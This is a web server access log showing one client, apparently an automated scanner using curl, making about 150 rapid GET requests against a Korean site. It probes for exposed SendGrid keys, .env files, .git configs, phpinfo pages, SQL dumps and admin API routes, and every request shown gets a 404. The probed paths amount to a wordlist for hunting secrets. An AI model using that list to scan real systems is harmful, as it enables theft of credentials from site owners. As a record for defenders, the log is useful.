"/.env.sendgrid" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid_keys.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/private/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/uploads/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/plugins/wp-mail-smtp/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/plugins/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/modules/contrib/sendgrid_mail/sendgrid_mail.module" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/modules/contrib/sendgrid_mail/sendgrid_mail.settings.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/modules/contrib/sendgrid_mail/sendgrid_mail.services.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/themes/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/uploads/wp-mail-smtp/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backup/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-includes/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-admin/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid_keys" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.sendgrid/credentials" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.sendgrid/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/sendgrid_config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/sendgrid_keys" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/sendgrid_config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/sendgrid_keys" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/sendgrid_config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets/sendgrid_keys" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets/sendgrid_config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/sendgrid.py" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings/sendgrid_keys" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings/sendgrid_config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/settings/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/settings/sendgrid_config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/env/sendgrid.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/env/sendgrid_keys.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/instance/sendgrid_keys.py" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid_keys.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid_keys.py" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/keys/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api_keys/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/packages/sendgrid.yaml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/secrets/prod/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/secrets/dev/sendgrid_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/sendgrid.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/sendgrid.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/sendgrid.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets/sendgrid.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/sendgrid.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/sendgrid.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php.orig" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.phtml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/%c0/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configs/application.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_profiler/empty/search/results" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/service" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/system/info" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/gateway" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/command" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin/user" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin/user/password" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin/user/status" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin/auth" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin/role" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin/role/id" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/admin" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/sms-sender" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/finchat/contact/manager" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/finchat/privilege-api/forwarder" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/finchat/privilege-api/forwarder/event" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/finchat/open-api" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/upload" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/savefile" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/files" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/files.remote.share" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/netdisk/download" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sources/api/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/api/bzycs.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/api/config.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web/api/config.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/.git/config" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/finchat/open-api/auth/token" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/account/oauth/token" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/account/oauth/ticket" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/tokens" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/login" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/auth" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/authentication" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/auth/v1/pin/verify" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/register" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/resetpassword" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/drupal/coder/.git/info/refs" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/drupal/coder/.git/info/exclude" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/drupal/coder/.git/objects/info" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/drupal/coder/.git/objects/info/packs" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/member/space/company/info.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cmsmessages/information.aspx" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cmsmessages/information.aspx.cs" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/module/info/include/mysql/phpcms_info.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.dev" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.test" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo-prod" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo-preprod" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.stg" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo-server" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo-server.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.srv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo-api" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfoapi" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo_details.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo_details" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfomolten.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfodev" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/shop/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bitrix/admin/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/mambo/administrator/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/lib/zend/tool/framework/system/provider/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/plugins/phpinfo" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/.git/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/blog/wp-content/themes/.git/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/themes/.git/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/plugins/.git/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/db.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/mysql.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/dump.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:48 +0000] - 404 404 - GET https 